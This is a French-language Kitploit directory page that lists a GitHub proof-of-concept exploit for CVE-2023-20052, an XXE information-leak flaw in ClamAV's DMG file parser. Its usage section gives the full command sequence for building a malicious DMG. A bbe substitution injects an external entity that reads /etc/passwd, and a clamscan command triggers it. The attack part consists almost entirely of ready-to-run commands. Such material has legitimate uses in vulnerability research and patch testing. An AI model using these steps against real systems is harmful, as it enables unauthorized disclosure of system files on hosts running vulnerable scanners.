Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-20052 — CVE-2023-20052, vulnérabilité de fuite d'informations dans l'analyseur de fichiers DMG de ClamAV | Kitploit
Outils/GitHubGitHub/nokn0wthing/cve-2023-20052
Analyse des VulnérabilitésExploitationCollecte d'InformationsFuzzingAnalyse de Malware
GitHubnokn0wthing/cve-2023-20052

CVE-2023-20052

CVE-2023-20052, vulnérabilité de fuite d'informations dans l'analyseur de fichiers DMG de ClamAV

Voir le dépôt
2752il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-20052

CVE-2023-20052, vulnérabilité de fuite d'informations dans l'analyseur de fichiers DMG de ClamAV

Utilisation
Pour créer un fichier DMG malveillant

root@kitploit:~
git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

Pour déclencher l'exploit
clamscan --debug exploit.dmg

Télécharger l’outil